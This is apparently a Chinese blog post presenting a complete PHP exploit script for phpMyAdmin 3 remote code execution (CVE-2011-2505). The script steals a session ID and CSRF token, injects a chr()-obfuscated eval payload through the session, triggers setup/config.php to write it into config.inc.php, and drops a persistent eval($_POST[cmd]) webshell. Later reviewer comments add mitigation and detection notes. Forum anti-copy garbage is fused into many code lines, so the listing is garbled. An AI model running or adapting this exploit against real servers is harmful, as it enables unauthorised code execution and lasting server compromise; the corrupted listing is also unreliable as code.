最近在家做专职奶爸,不谙圈内事很多个月了,博客也无更新。
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了一番,写出了这个冷饭exp。由于我搞得晚了,之前已经很多人研究并写了exp,于是我这个属于炒冷饭,权当研究研究打发时间了。
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
一是session.auto_start = 1;
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
于是写了这个php版本的exp,代码如下:
2 j4 L; `3 H. w3 }8 `#!/usr/bin/php
: G8 t N4 p6 b: z# o<?php; t0 U& Z( \$ i# N9 i, y
// Banner: tool identity and the CVE the author assigns to the issue (CVE-2011-2505).
// NOTE(review): the listing as captured carries forum anti-copy garbage fused into
// several lines (e.g. `Vecho`, `lif(`, `Apreg_match`, `secho`, `Nphp_request`);
// it is reproduced here exactly as found rather than reconstructed.
print_r('! P+ A9 \! A: D& @# |" b
+---------------------------------------------------------------------------+' G+ H/ g. v) T5 m8 T$ z* S* O
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
+ r2 X$ E8 `) z- d& |2 L W0 r4 c* y& qby oldjun(www.oldjun.com)9 t3 [6 |6 S0 }1 w, k
welcome to www.t00ls.net
5 {! y/ g, }) c9 a: g% J5 Amail: oldjun@gmail.com
. p5 r8 {1 m. S; \" w1 G2 {Assigned CVE id: CVE-2011-2505" U X) v6 H q0 m2 e" M+ H
+---------------------------------------------------------------------------+
( p9 {8 @( w& k6 g) o% w0 A');# N7 l/ R* \0 c3 U5 v
) U3 B" Y+ ~# b: x& o
// Precondition stated by the author: the exploit only succeeds if <path>/config/
// exists and is writable by the web server. Mitigation follows directly: remove or
// deny web access to config/ (and to setup/, which this script posts to) once
// installation is complete, and apply the vendor fix for CVE-2011-2505.
/**
# U% f1 V: m5 j9 `$ r% U * working when the directory:"config" exists and is writeable.+ b- H+ M j4 t3 C! N
**/% Q j, ~, Y& S$ U" w
0 v6 ]5 u; H, A7 S# |1 T$ B3 c
// CLI argument handling: $argc/$argv are PHP's CLI argument count and vector.
// Fewer than two positional arguments prints the usage text and exits.
if ($argc < 3) {
. u0 `8 [4 S0 g9 X/ f& h print_r('8 `; D) m, S/ S F; ], j$ ^
+---------------------------------------------------------------------------+
: s8 v) \) G& U# L; z8 v* |Usage: php '.$argv[0].' host path* I- O/ \- a7 j- a
host: target server (ip/hostname)* ~: b* c; L( j. \' |2 V9 h
path: path to pma3: v; _5 P1 ~5 [
Example:1 i# p2 w( e$ }' d: g- F5 Z' f9 m; w
php '.$argv[0].' localhost /pma/
' _/ a- H F5 @4 e5 f& F8 r+ _+---------------------------------------------------------------------------+
) v( M6 y* I0 N/ j3 N( W7 D');
; s ]) F7 k$ @) u9 F+ z2 c% ~9 Y exit;3 Q4 L# n4 z6 `% J+ v: R7 g; N1 h8 z- J
}# m4 }0 g7 D0 e% e2 e8 S6 N0 `
- Y+ p9 l4 G: L8 @" o( G
// Target host and web path, taken verbatim from the command line. Both are
// interpolated unvalidated into the raw HTTP request built by php_request() below.
$host = $argv[1];
7 D5 s. k. e3 I f. B8 M$path = $argv[2];
' z4 L! n3 A3 Q8 e$ j H2 ?/ `7 N1 X2 s
/**! x0 j& @7 Z- R# L# P
* Try to determine if the directory:"config" exists' ]4 ~: x- Z" E' e4 a
**/
// Step 1: reachability probe for <path>/config/. The test is a substring search for
// '404' anywhere in the raw response returned by php_request() (status line, headers
// and body alike), not a parse of the HTTP status code, so the outcome depends on
// how the server words its error page.
. i4 w1 F b+ S! y, _( j# Vecho "[+] Try to determine if the directory:config exists....\n";% `( z2 x- x, W9 O( M9 `9 h/ L
$returnstr=php_request('config/');
6 n: [) \2 x8 W- lif(strpos($returnstr,'404')){
, _ L9 x0 h* K$ o& ] exit("[-] Exploit Failed! The directory:config do not exists!\n");
' Y; H- I9 p' B( n( D}
% ^0 C# H5 B" M0 p
% i( {8 M, v/ M8 E& a/**
1 H. r) B3 x4 L, G. ^$ R! z * Try to get token and sessionid
' ]; c8 m1 b- L0 O8 [3 i( Z0 n# H**// S0 L2 {( [" ^. R) H3 Y5 N
// Step 2: fetch index.php and pull two values out of the response with one regex:
// capture 1 is the phpMyAdmin session cookie value, capture 3 the anti-CSRF token
// that every later request must carry.
echo "[+] Try to get token and sessionid....\n";. Z. H4 V, Z3 x: ]! Y8 n5 K# ~
$result=php_request('index.php');
o8 | }; W1 R7 g* }9 d% F- Apreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
' Y- J- J. ~% A& Q5 W$ ~$token=$resp[3];+ A3 a( n) H) C2 f+ I' f9 i
$sessionid=$resp[1];' b# p0 y4 \- g* q4 O- U
// NOTE(review): the two echo lines below print the literal words "token" and
// "sessionid"; the `$` sigils were most likely lost in the forum copy.
if($token && $sessionid){5 q1 y$ c y8 O' v1 X
echo "[+] token token\n";
7 y" w! C9 q5 F2 c- j4 a$ _ X echo "[+] Session ID sessionid\n";2 o6 V, \7 g8 v9 J+ n
}else{
' w& L; L. h: h0 L" [ exit("[-] Can't get token and Session ID,Exploit Failed!\n");
4 W# l; A, W7 A% i}
2 I: ~" Z5 O$ o
3 C" ]& M2 Y* G. M2 m$ _5 p/ V& v" s/**
0 d8 e8 Q& O3 ]" ?5 v5 z+ y * Try to insert shell into session
" [3 X! v2 G; r**/
// Step 3: the vulnerable request (CVE-2011-2505). A single GET to db_create.php
// carries `session_to_unset` together with a `_SESSION[ConfigFile][Servers][...][host]`
// parameter, which the unpatched code evidently writes straight into the server-side
// PHP session. The server-name key is wrapped in `*/ ... /*`, so when the setup
// script later renders the session-held config into config/config.inc.php (step 4)
// the chr()-encoded eval() lands outside a comment and becomes live PHP. The
// author's trailing comment notes that most top-level pma3 scripts accept the
// same parameters.
// Detection: `session_to_unset` or `_SESSION[` appearing in the query string of any
// request to a phpMyAdmin script is a direct indicator of this attack and is
// captured by an ordinary web-server access log.
4 { n {2 y6 secho "[+] Try to insert shell into session....\n";* l- X% @. q/ u9 h7 I
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
4 x3 ~# n0 ?* s' a6 E3 ^9 M) R0 q2 Z p+ a
/**7 Q* b) e# M& @) I, Q, A8 l
* Try to create webshell" V6 z1 B y2 k! S& S; c
**/" U( H& E$ C7 ^+ U2 _
// Step 4: trigger the write. A POST to setup/config.php with submit_save=Save,
// carrying the same session cookie and token, makes the setup script persist the
// poisoned session as config/config.inc.php. This only works where setup/ is still
// web-reachable and config/ is writable — both removable after installation.
echo "[+] Try to create webshell....\n";
- i( T+ R! _* Nphp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
+ \+ d- M) N/ \" i$ F6 O/**
6 v4 {/ ?2 W6 p6 k9 ]: n1 X) r * Try to check if the webshell was created successfully* S' K. A X/ g i4 {3 W0 ?
**/ y2 p1 ?) o* |$ f' }& D* B
// Step 5: confirm by fetching the freshly written config file. Executing it runs the
// chr()-encoded payload, which drops config/a.php (the eval($_POST[cmd]) one-liner
// reported in the success message) and echoes the marker 't00ls' this check looks for.
// Artefacts for responders: a web-reachable config/config.inc.php that executes code
// when requested, and an unexpected config/a.php.
echo "[+] Try to check if the webshell was created successfully....\n";
E/ p: i5 P6 v$content=php_request('config/config.inc.php');
; U1 a$ }) n i$ `if(strpos($content,'t00ls')){- I% b- U4 e# w# `" C; V/ p
echo "[+] Congratulations! Expoilt successfully....\n";
, O( K7 F; ?' ]' U echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
& v- B) [7 L$ {( w$ a, K}else{
# M( I% C! f% j- p, A5 h. y exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");: B7 r9 ^9 v9 T4 `+ P
}
' C& k2 |: { t" J/ L. b" [- r" @2 P* q$ ^
/**
 * Send one hand-built HTTP/1.1 request to the target and return the complete raw
 * response (status line, headers and body) as a single string.
 *
 * @param string $url    Path relative to the pma3 base directory; $path is prepended.
 * @param string $data   Request body. Non-empty makes the request a POST with
 *                       Content-Type application/x-www-form-urlencoded and a
 *                       Content-Length header; empty makes it a GET.
 * @param string $cookie Raw Cookie header value (e.g. "phpMyAdmin=<sid>"); the
 *                       header is omitted when empty.
 * @return string        Everything read from the socket until the server closes it.
 *
 * Reads the globals $host and $path set by the caller. Connects in plain text to
 * port 80 (hard-coded, no TLS) with fsockopen's default timeout and dies if the
 * connection fails; the fputs() result is not checked. Because headers are returned
 * together with the body, callers' strpos() checks match header text as well.
 * Defender note: the fixed User-Agent string ("MSIE 6.00; Windows NT 5.1; SV1")
 * and "Connection: Close" on every request are stable fingerprints of this tool in
 * access logs.
 * NOTE(review): forum anti-copy garbage is fused into several lines below; the code
 * is reproduced exactly as found.
 */
function php_request($url,$data='',$cookie=''){
5 c0 D9 ?$ |( s$ g global $host, $path;' W% o: ~& [0 g3 F) b3 x6 F D
/ [' j* g9 p5 J( \) N# t7 R
// The presence of a body is the only thing that selects POST over GET.
$method=$data?'POST':'GET';
; i/ y- q- X p, d5 m: ~" ^
// Request line and headers are concatenated by hand; $path.$url is sent as-is.
9 C& Q/ E" @9 d1 U0 m $packet = $method." ".$path.$url." HTTP/1.1\r\n";
" K q+ o# I/ k3 x $packet .= "Accept: */*\r\n";
/ N$ f6 i6 j; p: K) b8 l! r $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
6 q. E: n8 n5 k, h) i $packet .= "Host: $host\r\n";
. A( }4 ?- Y7 p2 m) c: I $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
( z: `( K) h0 S( d, i $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
6 Y5 w6 H, P* f& L7 N$ j$ ~ $packet .= $cookie?"Cookie: $cookie\r\n":"";
6 O0 w8 A7 q! n' L $packet .= "Connection: Close\r\n\r\n";
( i7 B$ _) A* B $packet .= $data?$data:"";
! `, `; o* r3 C8 S9 C2 f; J% {6 T! h! {
// Plain TCP to port 80; the hostname is resolved here rather than by fsockopen.
$fp = fsockopen(gethostbyname($host), 80);$ @; A6 k+ g6 V6 m4 @$ M/ X3 b
if (!$fp) {' \: h h7 W, z( k+ s, c
echo 'No response from '.$host; die;
5 y6 V6 L- v2 L8 q% z }
* t% _2 z- f. u' |3 w. w% `5 e% f fputs($fp, $packet);: l1 Z9 F1 f- ^ K. ]& W
// Read until EOF; "Connection: Close" above is what makes the server close the socket.
# A, l. `+ q- w5 r- s, T $resp = '';; H: h, [0 K; U' ^. C3 S! l9 g
% I& z3 v( x5 X2 O- M while ($fp && !feof($fp))
v- P0 _& r- s1 e( p, c3 D $resp .= fread($fp, 1024);
; M0 ^2 Q$ Z" m$ f6 |0 Q g0 y
9 x, |6 r- g6 _& P! I return $resp;
9 u- y( T0 \* K$ L* W}
- s/ Q- P3 P) |4 h( l . X# _+ B4 o+ s) r; p Q
?>
* g# g, l; A/ Q( }! ^' f9 H. |